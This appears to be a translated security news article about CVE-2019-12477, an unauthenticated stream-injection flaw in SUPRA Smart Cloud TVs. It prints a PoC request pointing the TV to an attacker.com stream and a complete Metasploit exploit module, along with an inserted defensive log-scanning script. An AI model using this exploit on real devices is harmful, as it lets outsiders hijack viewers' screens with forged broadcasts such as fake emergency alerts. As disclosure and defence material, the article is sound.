
How I Took Control of a SUPRA Smart Cloud TV

Recently, Dubai-based security researcher Dhiraj Mishra found that SUPRA Smart Cloud TVs carry a playback-hijacking vulnerability (CVE-2019-12477): an attacker on the same wireless network as the TV can send forged playback requests to the set and splice in arbitrary video content or fake broadcast messages.

SUPRA Smart Cloud TVs are reportedly very popular in Russia and Eastern Europe and are sold mainly through online channels to Russia, China, the UAE and other countries. The flaw Dhiraj Mishra found lies in the TV's stream-retrieval function 'openLiveURL()', which the SUPRA TV uses to fetch streaming content for playback. Mishra found that this function has no authentication, authorization or session management, so an attacker can trigger the flaw by sending a crafted request to a static URL, bypass authorization, inject a remote video stream file into the playback mechanism and play arbitrary video content.

Vulnerability details

Dhiraj Mishra says he found the vulnerability through source-code review, application enumeration and sending requests. The vulnerable endpoint is /remote/media_control?action=setUri&uri=URI on the server side, and the vulnerable function is openLiveTV(url). Here is a source snippet of openLiveTV(url):

function openLiveTV(url) {
  $.get("/remote/media_control", {m_action: 'setUri', m_uri: url, m_type: 'video/*'},
    function (data, textStatus) {
      if ("success" == textStatus) {
        alert(textStatus);
      } else {
        alert(textStatus);
      }
    });
}


The crafted request that makes the TV play an arbitrary video:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Of course, the request can also be sent directly to a SUPRA smart TV on the same wireless network in the following form, which achieves the same injected-playback effect:

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8           

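As an added defensive example that is not part of the original article or the Metasploit module, the following Python check scans captured HTTP requests (access-log format) for media_control setUri calls whose stream URL is not on an allowlist of legitimate origins, and tells streams served from a host on the same private network apart from external ones. The log lines and the allowlist host cdn.vendor.example are constructed for the demonstration; both parameter spellings seen on this page (m_action/m_uri from openLiveTV and action/uri from the PoC request) are recognised.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests in access-log format; the 192.168.1.77 lines mirror the page's PoC.
SAMPLE_LOG = """\
192.168.1.20 - - [03/Jun/2019:10:00:01 +0000] "GET /remote/media_control?m_action=setUri&m_uri=http://cdn.vendor.example/live/ch1.m3u8&m_type=video/* HTTP/1.1" 200 2
192.168.1.77 - - [03/Jun/2019:10:00:05 +0000] "GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1" 200 2
192.168.1.77 - - [03/Jun/2019:10:00:09 +0000] "GET /remote/media_control?action=setUri&uri=http://192.168.1.77:8080/epicsax.m3u8 HTTP/1.1" 200 2
192.168.1.20 - - [03/Jun/2019:10:00:12 +0000] "GET /remote/media_control?action=getStatus HTTP/1.1" 200 40
"""
ALLOWED_STREAM_HOSTS = {"cdn.vendor.example"}  # hypothetical allowlist of legitimate stream origins
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

def parse_set_uri(target):
    """Return the stream URL of a media_control setUri request, else None.
    Accepts both m_action/m_uri (the TV's openLiveTV) and action/uri (the PoC)."""
    parts = urlsplit(target)
    if parts.path != "/remote/media_control":
        return None
    qs = parse_qs(parts.query)
    action = (qs.get("action") or qs.get("m_action") or [None])[0]
    if action != "setUri":
        return None
    return (qs.get("uri") or qs.get("m_uri") or [None])[0]

def classify_stream_source(stream_url, allowed_hosts=ALLOWED_STREAM_HOSTS):
    """'allowed' for allowlisted origins, 'lan-host' when served from a private
    address (a box on the same wireless network), otherwise 'external'."""
    host = urlsplit(stream_url).hostname or ""
    if host in allowed_hosts:
        return "allowed"
    try:
        return "lan-host" if ipaddress.ip_address(host).is_private else "external"
    except ValueError:  # a hostname rather than an IP literal
        return "external"

def find_injected_streams(log_text, allowed_hosts=ALLOWED_STREAM_HOSTS):
    """Return (client, stream_url, verdict) for every setUri not on the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        stream = parse_set_uri(m.group("target")) if m else None
        if stream is None:
            continue
        verdict = classify_stream_source(stream, allowed_hosts)
        if verdict != "allowed":
            hits.append((m.group("client"), stream, verdict))
    return hits
```

Because the endpoint itself has no authentication, the only workable control on an unpatched set is network-side: restrict which hosts may reach the TV's web port and alert on any setUri whose source is not an expected origin.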

Although the vulnerability was found some time ago, I simply could not reach the SUPRA smart TV vendor, so it remains unpatched to this day. The following PoC video shows a SUPRA smart TV playing a Steve Jobs speech when an attacker exploits the flaw above to suddenly splice in a fake U.S. Emergency Alert System message:

Metasploit exploit module

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Supra Smart Cloud TV Remote File Inclusion',
      'Description'    => %q{
        This module exploits an unauthenticated remote file inclusion which
        exists in Supra Smart Cloud TV. The media control for the device doesn't
        have any session management or authentication. Leveraging this, an
        attacker on the local network can send a crafted request to broadcast a
        fake video.
      },
      'Author'         => [
        'Dhiraj Mishra', # Discovery, PoC, and module
        'wvu'            # Module
      ],
      'References'     => [
        ['CVE', '2019-12477'],
        ['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html']
      ],
      'DisclosureDate' => '2019-06-03',
      'License'        => MSF_LICENSE
    ))

    deregister_options('URIPATH')
  end

  def run
    start_service('Path' => '/')

    print_status("Broadcasting Epic Sax Guy to #{peer}")

    res = send_request_cgi(
      'method'        => 'GET',
      'uri'           => '/remote/media_control',
      'encode_params' => false,
      'vars_get'      => {
        'action'      => 'setUri',
        'uri'         => get_uri + 'epicsax.m3u8'
      }
    )

    unless res && res.code == 200 && res.body.include?('OK')
      print_error('No doo-doodoodoodoodoo-doo for you')
      return
    end

    # Sleep time calibrated using successful pcap
    print_good('Doo-doodoodoodoodoo-doo')
    print_status('Sleeping for 10s serving .m3u8 and .ts files...')
    sleep(10)
  end

  def on_request_uri(cli, request)
    dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')

    files = {
      '/epicsax.m3u8' => 'application/x-mpegURL',
      '/epicsax0.ts'  => 'video/MP2T',
      '/epicsax1.ts'  => 'video/MP2T',
      '/epicsax2.ts'  => 'video/MP2T',
      '/epicsax3.ts'  => 'video/MP2T',
      '/epicsax4.ts'  => 'video/MP2T'
    }

    file = request.uri

    unless files.include?(file)
      vprint_error("Sending 404 for #{file}")
      return send_not_found(cli)
    end

    data = File.read(File.join(dir, file))

    vprint_good("Sending #{file}")
    send_response(cli, data, 'Content-Type' => files[file])
  end

end


*Author of this article: clouds. Please credit FreeBuf.COM when reposting.
